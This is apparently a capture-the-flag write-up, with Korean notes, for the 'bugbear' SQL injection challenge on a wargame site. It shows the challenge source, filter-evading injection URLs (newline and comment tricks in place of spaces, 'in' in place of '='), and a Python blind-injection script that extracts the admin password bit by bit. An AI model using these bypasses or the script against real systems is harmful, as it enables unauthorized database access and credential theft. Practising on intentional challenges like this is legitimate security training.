[los]bugbear

query : select id from prob_bugbear where id='guest' and pw='' and no=

<?php 
  include "./config.php"; 
  login_chk(); 
  $db = dbconnect(); 
  if(preg_match('/prob|_|\.|\(\)/i', $_GET[no])) exit("No Hack ~_~"); 
  if(preg_match('/\'/i', $_GET[pw])) exit("HeHe"); 
  if(preg_match('/\'|substr|ascii|=|or|and| |like|0x/i', $_GET[no])) exit("HeHe"); 
  $query = "select id from prob_bugbear where id='guest' and pw='{$_GET[pw]}' and no={$_GET[no]}"; 
  echo "<hr>query : <strong>{$query}</strong><hr><br>"; 
  $result = @mysqli_fetch_array(mysqli_query($db,$query)); 
  if($result['id']) echo "<h2>Hello {$result[id]}</h2>"; 
   
  $_GET[pw] = addslashes($_GET[pw]); 
  $query = "select pw from prob_bugbear where id='admin' and pw='{$_GET[pw]}'"; 
  $result = @mysqli_fetch_array(mysqli_query($db,$query)); 
  if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("bugbear"); 
  highlight_file(__FILE__); 
?>

1. preg_match no : prob _ . ( )
2. preg_match pw : '
3. preg_match no : ' substr ascii = or and whitespace like 0x

https://los.rubiya.kr/chall/bugbear_19ebf8c8106a5323825b5dfa1b07ac1f.php?pw=a&no=1%0a||%0a%221%22%0ain(%221%22)%26%26%0aid%0ain(%22admin%22)
whitespace는 %0a로 우회 =,lkie 는 in으로 우회 '은 "로 우회

https://los.rubiya.kr/chall/bugbear_19ebf8c8106a5323825b5dfa1b07ac1f.php?pw=a&no=1%0a||%0a%221%22%0ain(%221%22)%26%26%0aid%0ain(%22admin%22)%26%26length(pw)%0ain(%228%22)
pw길이는 8

https://los.rubiya.kr/chall/bugbear_19ebf8c8106a5323825b5dfa1b07ac1f.php?pw=a&no=1||%0a%221%22%0ain(%221%22)%0a%26%26%0aid%0ain(%22admin%22)%0a%26%26%0amid(lpad(bin(ORD(mid(pw,1,1))),8,0),1,1)%0ain(%221%22)

select id from prob_bugbear where id='guest' and pw='a' and no=1||%0a"1"%0ain("1")%0a%26%26%0aid%0ain("admin")%0a%26%26%0amid(lpad(conv(hex(mid(pw,1,1)),16,2),8,0),1,1)%0ain("1")
1||%0a%221%22%0ain(%221%22)%0a%26%26%0aid%0ain(%22admin%22)%0a%26%26%0amid(lpad(conv(hex(mid(pw,1,1)),16,2),8,0),4,1)%0ain(%221%22)

Query: select id from prob_bugbear where id='guest' and pw='a' and no=1|| "1" in("1") && id in("admin") && mid(lpad(conv(hex(mid(pw,1,1)),16,2),8,0),4,1) in("1")
Query: select id from prob_bugbear where id='guest' and pw='a' and no=1||%0a"1"%0ain("1")%0a&&%0aid%0ain("admin")%0a&&%0amid(lpad(conv(hex(mid(pw,1,1)),16,2),8,0),4,1)%0ain("1")

쿼리문을 보니 원인은 whitespace가 %0a,%09 우회가 실패했다.. 그래서 /**/로 우회

 

파이썬코드

#bugbear BlindSqlInjection

import requests
#from itertools import product

chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789~!@#$%^&*'
pw_list = list()
pw_str = str()
url = 'https://los.rubiya.kr/chall/bugbear_19ebf8c8106a5323825b5dfa1b07ac1f.php'
cookies = {'PHPSESSID':'7cu8mcoov0uo0qirli9sk9d38j'}
for i in range(1,9):
    pw=str()
    for j in range(1,9):
        param={'pw':"a",
               'no':'1||/**/"1"/**/in("1")/**/&&/**/id/**/in("admin")/**/&&/**/mid(lpad(conv(hex(mid(pw,'+str(i)+',1)),16,2),8,0),'+str(j)+',1)/**/in("1")'
               }
        res=requests.get(url,cookies=cookies,params=param,verify=False)
        res_text=res.text
        print(res_text)
        if "Hello admin" in res_text:
            pw=pw+'1'
        else:
            pw=pw+'0'
    pw_list.append(pw)
    print(pw_list)

for a in pw_list:
    b=int('0b'+a,2)
    pw_str= pw_str+chr(b)


print("PW:"+pw_str)